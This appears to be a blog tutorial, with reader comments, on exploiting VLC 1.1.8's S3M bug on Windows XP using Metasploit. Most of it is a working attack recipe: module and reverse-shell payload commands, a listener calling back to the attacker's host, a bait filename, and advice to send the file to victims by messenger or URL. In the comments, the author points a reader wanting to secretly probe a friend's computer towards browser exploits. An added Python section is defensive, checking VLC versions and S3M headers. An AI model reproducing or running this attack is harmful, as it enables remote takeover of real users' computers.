VLC Media Player 1.1.8 modplug_s3m Exploit (Windows XP SP3)

Type : Tutorial

Level : Medium

Victim O.S : Windows XP SP3

Victim VLC Version : 1.1.8

While surfing around I found that VLC 1.1.8 has a vulnerability that can be exploited. If you don't yet know VLC media player, here is the description from its official website, videolan.org:

VLC is a free and open source cross-platform multimedia player and framework that plays most multimedia files as well as DVD, Audio CD, VCD, and various streaming protocols.

We will perform this exploit using the Metasploit Framework. According to the metasploit.com page for this vulnerability:

This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC.

Let's start…

Requirements :

1. Metasploit Framework

2. Operating System (I'm using BackTrack 5 R1 in this tutorial; the Metasploit Framework is already included in it)

Step By Step :

1. Open the Metasploit console by typing msfconsole, then load the vlc_modplug_s3m exploit and select a Windows payload (the commands below use windows/shell_reverse_tcp):

use exploit/windows/fileformat/vlc_modplug_s3m

set payload windows/shell_reverse_tcp

[Screenshot omitted: VLC Media Player 1.1.8 modplug_s3m Exploit Windows XP SP3]

2. To view the available options, run the show options command. I've configured my malicious s3m file as shown in the picture below.

[Screenshot omitted: VLC Media Player 1.1.8 modplug_s3m Exploit Windows XP SP3]

Information :

set filename sora-aoi.s3m --> a social-engineering filename, chosen to make the victim curious

set lhost --> the attacker machine's address (your local host)

set lport 443 --> the local port the attacker listens on

/root/.msf4/data/exploits/sora-aoi.s3m --> location of the generated malicious file; copy this file and send it to the victim

3. Before sending the malicious s3m file, set up a listener to catch the connection that comes back when the victim opens the file in VLC media player.

[Screenshot omitted: VLC Media Player 1.1.8 modplug_s3m Exploit Windows XP SP3]

4. Everything is now set up; the next step is to deliver the s3m file to the victim. You can send the file via messenger, a URL, or any other way you can think of…

5. After the victim opens the malicious s3m file, the shell_reverse_tcp payload connects back and we get a shell, as shown below.

[Screenshot omitted: VLC Media Player 1.1.8 modplug_s3m Exploit Windows XP SP3]

Countermeasures :

1. Always update your software to the latest version (for this issue, VLC 1.1.9 and later are not affected, per the module description above)

2. Install a personal firewall
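As an added example that is not part of the original tutorial, here is a small defender-side Python helper for the first countermeasure: it parses a VLC version string, reports whether it predates the 1.1.9 fix named in the module description, and identifies S3M files by their header signature rather than by extension, so a file like the renamed "sora-aoi.s3m" above can be triaged before it reaches an unpatched player. The 96-byte S3M header with the ASCII signature "SCRM" at offset 44 is a file-format fact, not something taken from the page; the function names and the sample inputs are my own constructions.

```python
"""Added defender-side helper (not from the original tutorial):
is this VLC older than the S3M fix, and does a given file look like S3M?"""
import re
from typing import Iterable, List, Tuple

# First VLC release the Metasploit module description names as unaffected.
FIXED_VERSION = (1, 1, 9)

# S3M (Scream Tracker 3 module) files carry the ASCII signature "SCRM"
# at byte offset 44 of their 96-byte header (file-format fact, not from the page).
S3M_MAGIC_OFFSET = 44
S3M_MAGIC = b"SCRM"


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn a VLC version string such as '1.1.8' or '1.1.8-git' into a comparable tuple."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised VLC version string: {version!r}")
    return tuple(int(x) for x in m.groups())


def vlc_is_vulnerable(version: str) -> bool:
    """True when the given VLC version predates the 1.1.9 fix for the libmodplug S3M bug."""
    return parse_version(version) < FIXED_VERSION


def is_s3m(data: bytes) -> bool:
    """Identify an S3M file by its header signature instead of trusting the file extension."""
    end = S3M_MAGIC_OFFSET + len(S3M_MAGIC)
    return len(data) >= end and data[S3M_MAGIC_OFFSET:end] == S3M_MAGIC


def triage(vlc_version: str, files: Iterable[Tuple[str, bytes]]) -> List[str]:
    """Return the names of files that would reach a vulnerable VLC as S3M input.

    `files` are (name, contents) pairs; an S3M header is flagged whatever the extension says.
    """
    if not vlc_is_vulnerable(vlc_version):
        return []
    return [name for name, data in files if is_s3m(data)]


def make_s3m_header(song_name: bytes = b"constructed sample") -> bytes:
    """Build a minimal, benign 96-byte S3M header for testing (constructed, not a real module)."""
    header = bytearray(96)
    header[:28] = song_name[:28].ljust(28, b"\x00")   # song name, NUL padded
    header[28] = 0x1A                                  # end-of-text marker
    header[29] = 16                                    # file type: ST3 module
    header[S3M_MAGIC_OFFSET:S3M_MAGIC_OFFSET + 4] = S3M_MAGIC
    return bytes(header)


if __name__ == "__main__":
    # Constructed inputs: an S3M, the same content behind another extension, and plain text.
    samples = [
        ("sora-aoi.s3m", make_s3m_header()),
        ("holiday.mp3", make_s3m_header()),
        ("notes.txt", b"just text, no header"),
    ]
    for ver in ("1.1.8", "1.1.9", "2.0.1"):
        state = "vulnerable" if vlc_is_vulnerable(ver) else "patched"
        print(f"VLC {ver}: {state}; files to hold back: {triage(ver, samples)}")
```

The version check is what an inventory or patch-compliance script would run against the installed player; the signature check is what a mail or download filter would apply, since the extension in the filename (chosen here purely for social engineering) says nothing about what the file actually contains.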

Hope it's useful 🙂


Blogger at hacking-tutorial.com. Love PHP, offensive security and web.
Contact him at me[-at-]vishnuvalentino.com

Website : http://www.vishnuvalentino.com

  • brad

    Is it possible to do something like this with a jpg?

    • v4L

      No, you can't.

  • nikon

    I was thinking about how I can scan for vulnerabilities over the internet. If this is possible, can you make a tutorial for that, please? I've been searching on Google for months and I haven't found anything. You are my last chance to learn how to do that. Thanks anyway.

    • v4L

      What do you mean? On the internet, about 60% of them are web servers, and most of them are inside a DMZ.

      • nikon

        I have a website and I want to put up a page with code written in PHP, HTML, or another language that scans the vulnerabilities of a computer when it is clicked. For example, I give the malicious link to my friend on the internet to try, he clicks the link, and I get a report of his vulnerabilities sent to my email or something like that. I know that this thing is possible to do, but I can't find anywhere how to do it. I searched on Google but found nothing. Please help me…

        • v4L

          Hmm, maybe it only works if you use ActiveX for IE, but for other browsers, AFAIK, the environment will act as a browser, not as a system.
          You can only detect which browser the user uses and which OS he uses.
          Except: you can exploit the browser through an available vulnerability to gain the system, then you'll get it 🙂

  • nikon

    When I have found the browser and the OS, what should I do? For example, I use Google Chrome version 20 and Windows 7 Ultimate SP1. With this information, how can an attacker attack me? How can I find the right exploit in Metasploit? If there isn't one for my versions, what is there for the older ones? Thanks for your time; your answers are very helpful.

    • v4L

      The target is vulnerable when the user and the system don't match one another.
      When the system is not vulnerable, then maybe the user is vulnerable, and vice versa.
      The right exploit is how you think about it…